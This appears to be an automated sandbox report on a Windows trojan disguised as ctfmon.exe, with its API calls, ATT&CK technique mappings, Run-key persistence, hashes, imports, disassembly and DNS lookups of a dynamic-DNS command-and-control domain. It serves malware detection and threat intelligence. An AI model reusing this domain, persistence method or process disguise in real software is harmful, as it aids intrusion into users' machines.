Source: ctfmon.exe, 00000000.00000002.2182890205.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000000.00000003.2182151088.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000000.00000003.2182333508.0000000000740000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000000.00000002.2182890205.0000000000740000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000003.00000002.4563354300.0000000000605000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\ctfmon.exeAPI call chain: ExitProcess graph end nodegraph_3-19849
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004014B0 VirtualAlloc,VirtualAlloc,WSAStartup,LoadLibraryW,GetProcAddress,FreeLibrary,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateEventW,CreateEventW,SetEvent,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,InternetCloseHandle,InternetOpenA,Sleep,InternetConnectA,InternetCloseHandle,Sleep,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetSetOptionA,Sleep,WaitForSingleObject,ResetEvent,HttpAddRequestHeadersA,HttpSendRequestA,InternetReadFile,GetLastError,SetEvent,0_2_004014B0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004140F6 SetUnhandledExceptionFilter,0_2_004140F6
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00414108 SetUnhandledExceptionFilter,0_2_00414108
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004140F6 SetUnhandledExceptionFilter,3_2_004140F6
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00414108 SetUnhandledExceptionFilter,3_2_00414108
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00414AE8 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_00414AE8
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00403190 CreateEventW,GetComputerNameW,gethostname,gethostbyname,timeGetTime,GetNativeSystemInfo,GetVersionExW,GetVersionExW,GetVersionExW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,0_2_00403190
Source: C:\Users\user\Desktop\ctfmon.exeCode function: cmd.exe0_2_00403DB0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: cmd.exe3_2_00403DB0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00404AD0 WSAStartup,htons,htons,htons,socket,bind,listen,select,select,accept,select,select,closesocket,closesocket,closesocket,closesocket,recv,closesocket,closesocket,closesocket,closesocket,0_2_00404AD0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00404AD0 WSAStartup,htons,htons,htons,socket,bind,listen,select,select,accept,select,select,closesocket,closesocket,closesocket,closesocket,recv,closesocket,closesocket,closesocket,closesocket,3_2_00404AD0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
1
Process Injection
11
Virtualization/Sandbox Evasion
1
Input Capture
1
System Time Discovery
Remote Services1
Input Capture
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
Security Account Manager11
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets11
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ctfmon.exe16%VirustotalBrowse
ctfmon.exe34%ReversingLabsWin32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://mircroupdata.dynamic-dns.net/item.asp?spm=xx0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
mircroupdata.dynamic-dns.net
127.0.0.1
truefalse
    unknown
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://mircroupdata.dynamic-dns.net/item.asp?spm=xxctfmon.exe, 00000003.00000002.4563354300.0000000000605000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      IP
      127.0.0.1
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1581370
      Start date and time:2024-12-27 14:12:08 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 43s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:ctfmon.exe
      Detection:MAL
      Classification:mal52.winEXE@2/0@16/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 86
      • Number of non-executed functions: 259
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
      • Excluded IPs from analysis (whitelisted): 20.190.177.83, 13.107.246.63, 20.109.210.53
      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      08:13:00API Interceptor11181451x Sleep call for process: ctfmon.exe modified
      14:13:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon.exe C:\Users\user\Desktop\ctfmon.exe
      14:13:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon.exe C:\Users\user\Desktop\ctfmon.exe
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      fp2e7a.wpc.phicdn.netwce.exeGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      atw3.dllGet hashmaliciousGozi, UrsnifBrowse
      • 192.229.221.95
      setup.msiGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      ERTL09tA59.exeGet hashmaliciousLummaCBrowse
      • 192.229.221.95
      vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      V2s8yjvIJw.exeGet hashmaliciousIris StealerBrowse
      • 192.229.221.95
      k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
      • 192.229.221.95
      G6xnfES308.exeGet hashmaliciousUnknownBrowse
      • 192.229.221.95
      XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
      • 192.229.221.95
      bG89JAQXz2.exeGet hashmaliciousLummaCBrowse
      • 192.229.221.95
      No context
      No context
      No context
      No created / dropped files found
      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.354684715897396
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:ctfmon.exe
      File size:252'928 bytes
      MD5:e93fc4c159d07f6bfc246c10e6149ef8
      SHA1:5cd471e675ee61296a0aa0ce842835e710025b65
      SHA256:184b00a27e5b28089f7061ab3f92d2d4edafae37d33fb9f97af81d3b5cbdb559
      SHA512:b3f3be44cf1f610de87f58496320e61ab79e69342b1febf93fc1a52880893cbad074ed13ccc38265449c2e2e7628d87f89b444137dfd2bbce2f1ba8e43b66ea8
      SSDEEP:3072:A1f8f6G8CA9f34u/TzY2gj4EHRormwPnBvAMv4SOJwA6ctTBfC9o2x3hhfmf:+feLA9f340I2gjH+rmwPWjwAtTBc3D
      TLSH:7034AE1273E0CCB3D65601714DE59BBAF3BABA110B228A4773845F1DDC325E1EB36256
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v...............4......V.......}...............j7..................................................1...}........4......R......
      Icon Hash:32fa7c1ea733b194
      Entrypoint:0x40d029
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      DLL Characteristics:
      Time Stamp:0x525B90B6 [Mon Oct 14 06:35:34 2013 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:634939b9007ba01c938016f96157c4a5
      Instruction
      push ebp
      mov ebp, esp
      push FFFFFFFFh
      push 0042ED30h
      push 00410450h
      mov eax, dword ptr fs:[00000000h]
      push eax
      mov dword ptr fs:[00000000h], esp
      sub esp, 58h
      push ebx
      push esi
      push edi
      mov dword ptr [ebp-18h], esp
      call dword ptr [0042C228h]
      xor edx, edx
      mov dl, ah
      mov dword ptr [0053F680h], edx
      mov ecx, eax
      and ecx, 000000FFh
      mov dword ptr [0053F67Ch], ecx
      shl ecx, 08h
      add ecx, edx
      mov dword ptr [0053F678h], ecx
      shr eax, 10h
      mov dword ptr [0053F674h], eax
      push 00000001h
      call 00007FCC00BCCBB9h
      pop ecx
      test eax, eax
      jne 00007FCC00BC985Ah
      push 0000001Ch
      call 00007FCC00BC9917h
      pop ecx
      call 00007FCC00BCC964h
      test eax, eax
      jne 00007FCC00BC985Ah
      push 00000010h
      call 00007FCC00BC9906h
      pop ecx
      xor esi, esi
      mov dword ptr [ebp-04h], esi
      call 00007FCC00BCC792h
      call 00007FCC00BCC6ECh
      mov dword ptr [00540ED4h], eax
      call 00007FCC00BCC575h
      mov dword ptr [0053F668h], eax
      call 00007FCC00BCC342h
      call 00007FCC00BCC285h
      call 00007FCC00BCA4DEh
      mov dword ptr [ebp-30h], esi
      lea eax, dword ptr [ebp-5Ch]
      push eax
      call dword ptr [0042C0E0h]
      call 00007FCC00BCC229h
      mov dword ptr [ebp-64h], eax
      test byte ptr [ebp-30h], 00000001h
      je 00007FCC00BC9858h
      movzx eax, word ptr [ebp-2Ch]
      Programming Language:
      • [ C ] VS98 (6.0) build 8168
      • [C++] VS98 (6.0) build 8168
      • [EXP] VC++ 6.0 SP5 build 8804
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x35e580x168.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1420000x2130.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x658.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x2ac230x2ae008ff9de624b732405f1f9db731eb2bb7dFalse0.5927933673469388COM executable for DOS6.635464677774594IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x2c0000xbf380xc0002b7a5f67a02fd719c3f105abeff28bb5False0.4624430338541667data5.592042341494126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x380000x109a080x480078f45c4a612e94c45b13ffd60238d233False0.1918402777777778data2.867400536704079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0x1420000x21300x2200d1f70376cfe6a43113860d5e2b9748c2False0.3831571691176471data4.784631023612771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_CURSOR0x142b980x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
      RT_CURSOR0x142cd00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
      RT_BITMAP0x142db00x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404ChineseChina0.34615384615384615
      RT_BITMAP0x1434800xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
      RT_BITMAP0x1435380x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260ChineseChina0.28296703296703296
      RT_BITMAP0x1436a80x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
      RT_ICON0x1425800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.46959459459459457
      RT_DIALOG0x1426c00x9adataEnglishUnited States0.6298701298701299
      RT_DIALOG0x1427600x84dataEnglishUnited States0.6666666666666666
      RT_DIALOG0x1433980xe2dataChineseChina0.6637168141592921
      RT_STRING0x1437f00x46dataEnglishUnited States0.6571428571428571
      RT_STRING0x1438380x50dataChineseChina0.85
      RT_STRING0x1438880x2cdataChineseChina0.5909090909090909
      RT_STRING0x1438b80x78dataChineseChina0.925
      RT_STRING0x1439300x1c4dataChineseChina0.8141592920353983
      RT_STRING0x143c800x12adataChineseChina0.5201342281879194
      RT_STRING0x143b380x146dataChineseChina0.6288343558282209
      RT_STRING0x143af80x40dataChineseChina0.65625
      RT_STRING0x1440a00x64dataChineseChina0.73
      RT_STRING0x143db00x1d8dataChineseChina0.6758474576271186
      RT_STRING0x143f880x114dataChineseChina0.6376811594202898
      RT_STRING0x1441080x24dataChineseChina0.4444444444444444
      RT_GROUP_CURSOR0x142d880x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0
      RT_GROUP_ICON0x1426a80x14dataEnglishUnited States1.15
      RT_VERSION0x1427e80x3acdataEnglishUnited States0.4723404255319149
      DLLImport
      KERNEL32.dllGetVolumeInformationW, GetFullPathNameW, GetTickCount, GetFileAttributesW, GetFileTime, GetStartupInfoW, ExitProcess, RtlUnwind, HeapFree, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, GetTimeZoneInformation, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, SetStdHandle, LCMapStringA, LCMapStringW, IsBadWritePtr, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetCPInfo, GetStringTypeA, GetStringTypeW, CompareStringA, CompareStringW, GetACP, GetOEMCP, SetEnvironmentVariableA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, FindResourceA, GlobalAddAtomA, GetProfileStringA, GetCurrentProcess, DuplicateHandle, SetErrorMode, FileTimeToLocalFileTime, FileTimeToSystemTime, GetThreadLocale, SizeofResource, GetProcessVersion, WritePrivateProfileStringW, GlobalFlags, lstrcmpiW, lstrcpynW, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalAlloc, FormatMessageW, LocalFree, FindNextFileW, FindFirstFileW, FindClose, MulDiv, SetLastError, InterlockedIncrement, InterlockedDecrement, GetModuleHandleA, LoadLibraryA, lstrlenA, MultiByteToWideChar, GetVersion, lstrcatW, GlobalAddAtomW, GlobalFindAtomW, lstrcpyW, GetModuleHandleW, GlobalUnlock, GlobalFree, LockResource, FindResourceW, LoadResource, GetModuleFileNameW, GlobalLock, lstrcmpW, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, lstrcmpiA, lstrlenW, GetCurrentThread, GetCurrentThreadId, GetCommandLineW, GetCommandLineA, WideCharToMultiByte, CreateFileW, GetFileSize, SetFilePointer, CreatePipe, CreateProcessW, PeekNamedPipe, ReadFile, WriteFile, GetLogicalDrives, GetDriveTypeA, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetComputerNameW, GetVersionExW, OpenProcess, TerminateProcess, CloseHandle, DeleteFileW, VirtualAlloc, LoadLibraryW, GetProcAddress, FreeLibrary, CreateEventW, WaitForSingleObject, ResetEvent, GetLastError, CreateThread, SetEvent, GetModuleFileNameA, Sleep
      USER32.dllRegisterClipboardFormatW, PostThreadMessageW, UpdateWindow, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, GetSysColor, SetFocus, AdjustWindowRectEx, ScreenToClient, CopyRect, GetTopWindow, IsChild, GetCapture, WinHelpW, wsprintfW, GetClassInfoW, RegisterClassW, GetMenu, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextW, GetDlgCtrlID, DefWindowProcW, CreateWindowExW, SetPropW, UnhookWindowsHookEx, GetPropW, CallWindowProcW, RemovePropW, GetMessageTime, GetMessagePos, InflateRect, SetForegroundWindow, SetWindowLongW, RegisterWindowMessageW, OffsetRect, IntersectRect, SystemParametersInfoW, GetWindowPlacement, GetWindowRect, MapDialogRect, SetWindowPos, SetWindowContextHelpId, EndDialog, SetActiveWindow, IsWindow, MessageBeep, DestroyWindow, GetDlgItem, GetMenuCheckMarkDimensions, LoadBitmapW, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetFocus, GetNextDlgTabItem, GetMessageW, TranslateMessage, DispatchMessageW, GetActiveWindow, LoadIconW, SendMessageW, AppendMenuW, GetSystemMenu, UnregisterClassW, GetWindowTextLengthA, HideCaret, ShowCaret, GetKeyState, CallNextHookEx, ValidateRect, IsWindowVisible, PeekMessageW, GetCursorPos, SetWindowsHookExW, GetParent, GetLastActivePopup, IsWindowEnabled, GetWindowLongW, MessageBoxW, SetCursor, PostQuitMessage, PostMessageW, CharUpperW, InvalidateRect, GetForegroundWindow, EnableWindow, IsIconic, ExcludeUpdateRgn, GetWindowTextA, DrawTextA, DrawFocusRect, GetClassInfoA, DefDlgProcA, DefWindowProcA, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, DrawIcon, GetClientRect, GetSystemMetrics, SetRect, CopyAcceleratorTableW, CharNextW, GetSysColorBrush, PtInRect, GetClassNameW, CreateDialogIndirectParamW, GetNextDlgGroupItem, GetDesktopWindow, LoadCursorW, GrayStringW, DrawTextW, TabbedTextOutW, EndPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, DestroyMenu, LoadStringW, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, GetWindow, BeginPaint
      GDI32.dllSetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, DeleteObject, SetMapMode, GetDeviceCaps, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, PtVisible, RectVisible, TextOutW, ExtTextOutW, Escape, GetTextColor, GetBkColor, DPtoLP, LPtoDP, GetMapMode, PatBlt, SetBkMode, GetStockObject, SelectObject, RestoreDC, SaveDC, DeleteDC, GetObjectW, SetBkColor, SetTextColor, GetClipBox, CreateDIBitmap, ExtTextOutA, GetTextExtentPointA, BitBlt, CreateCompatibleDC, CreateBitmap
      comdlg32.dllGetFileTitleW
      WINSPOOL.DRVClosePrinter, DocumentPropertiesW, OpenPrinterW
      ADVAPI32.dllRegSetValueExA, RegSetValueExW, RegOpenKeyExW, RegCreateKeyExW, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
      SHELL32.dllShellExecuteW
      COMCTL32.dll
      oledlg.dllOleUIBusyW
      ole32.dllCoRegisterMessageFilter, CoRevokeClassObject, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CoTaskMemAlloc, CoTaskMemFree, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, OleFlushClipboard, OleIsCurrentClipboard
      OLEPRO32.DLL
      OLEAUT32.dllSysAllocString, VariantChangeType, VariantCopy, VariantTimeToSystemTime, VariantClear, SysAllocStringLen, SysFreeString, SysStringLen
      WININET.dllInternetCloseHandle, InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpAddRequestHeadersA, HttpSendRequestA, InternetReadFile
      WINMM.dlltimeGetTime
      PSAPI.DLLGetModuleFileNameExW, EnumProcesses, EnumProcessModules
      iphlpapi.dllGetAdaptersInfo
      WS2_32.dllbind, listen, accept, select, recv, gethostname, htons, inet_addr, gethostbyname, WSAGetLastError, WSAStartup, closesocket, send, connect, socket
      Language of compilation systemCountry where language is spokenMap
      ChineseChina
      EnglishUnited States
      TimestampSource PortDest PortSource IPDest IP
      Dec 27, 2024 14:13:02.615452051 CET6170453192.168.2.61.1.1.1
      Dec 27, 2024 14:13:03.600874901 CET6170453192.168.2.61.1.1.1
      Dec 27, 2024 14:13:03.997077942 CET53617041.1.1.1192.168.2.6
      Dec 27, 2024 14:13:03.997112036 CET53617041.1.1.1192.168.2.6
      Dec 27, 2024 14:13:33.946146011 CET5652653192.168.2.61.1.1.1
      Dec 27, 2024 14:13:34.944216013 CET5652653192.168.2.61.1.1.1
      Dec 27, 2024 14:13:35.218943119 CET53565261.1.1.1192.168.2.6
      Dec 27, 2024 14:13:35.218956947 CET53565261.1.1.1192.168.2.6
      Dec 27, 2024 14:14:05.814862013 CET6313353192.168.2.61.1.1.1
      Dec 27, 2024 14:14:06.803857088 CET6313353192.168.2.61.1.1.1
      Dec 27, 2024 14:14:07.058629990 CET53631331.1.1.1192.168.2.6
      Dec 27, 2024 14:14:07.058650970 CET53631331.1.1.1192.168.2.6
      Dec 27, 2024 14:14:37.665721893 CET5145053192.168.2.61.1.1.1
      Dec 27, 2024 14:14:38.679044008 CET5145053192.168.2.61.1.1.1
      Dec 27, 2024 14:14:39.127676964 CET53514501.1.1.1192.168.2.6
      Dec 27, 2024 14:14:39.127697945 CET53514501.1.1.1192.168.2.6
      Dec 27, 2024 14:15:10.776367903 CET5634153192.168.2.61.1.1.1
      Dec 27, 2024 14:15:11.788547039 CET5634153192.168.2.61.1.1.1
      Dec 27, 2024 14:15:12.032366037 CET53563411.1.1.1192.168.2.6
      Dec 27, 2024 14:15:12.032439947 CET53563411.1.1.1192.168.2.6
      Dec 27, 2024 14:15:42.650819063 CET6292953192.168.2.61.1.1.1
      Dec 27, 2024 14:15:43.664336920 CET6292953192.168.2.61.1.1.1
      Dec 27, 2024 14:15:43.902530909 CET53629291.1.1.1192.168.2.6
      Dec 27, 2024 14:15:43.902556896 CET53629291.1.1.1192.168.2.6
      Dec 27, 2024 14:16:14.262927055 CET5063953192.168.2.61.1.1.1
      Dec 27, 2024 14:16:15.273318052 CET5063953192.168.2.61.1.1.1
      Dec 27, 2024 14:16:15.416356087 CET53506391.1.1.1192.168.2.6
      Dec 27, 2024 14:16:15.416402102 CET53506391.1.1.1192.168.2.6
      Dec 27, 2024 14:16:44.901200056 CET5242453192.168.2.61.1.1.1
      Dec 27, 2024 14:16:45.898597002 CET5242453192.168.2.61.1.1.1
      Dec 27, 2024 14:16:46.155421972 CET53524241.1.1.1192.168.2.6
      Dec 27, 2024 14:16:46.155436993 CET53524241.1.1.1192.168.2.6
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 27, 2024 14:13:02.615452051 CET192.168.2.61.1.1.10x1aedStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:13:03.600874901 CET192.168.2.61.1.1.10x1aedStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:13:33.946146011 CET192.168.2.61.1.1.10x26dcStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:13:34.944216013 CET192.168.2.61.1.1.10x26dcStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:05.814862013 CET192.168.2.61.1.1.10xd85eStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:06.803857088 CET192.168.2.61.1.1.10xd85eStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:37.665721893 CET192.168.2.61.1.1.10x1008Standard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:38.679044008 CET192.168.2.61.1.1.10x1008Standard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:10.776367903 CET192.168.2.61.1.1.10x305bStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:11.788547039 CET192.168.2.61.1.1.10x305bStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:42.650819063 CET192.168.2.61.1.1.10xb5adStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:43.664336920 CET192.168.2.61.1.1.10xb5adStandard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:14.262927055 CET192.168.2.61.1.1.10xfc38Standard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:15.273318052 CET192.168.2.61.1.1.10xfc38Standard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:44.901200056 CET192.168.2.61.1.1.10xe938Standard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:45.898597002 CET192.168.2.61.1.1.10xe938Standard query (0)mircroupdata.dynamic-dns.netA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 27, 2024 14:12:58.344664097 CET1.1.1.1192.168.2.60x5658No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      Dec 27, 2024 14:12:58.344664097 CET1.1.1.1192.168.2.60x5658No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
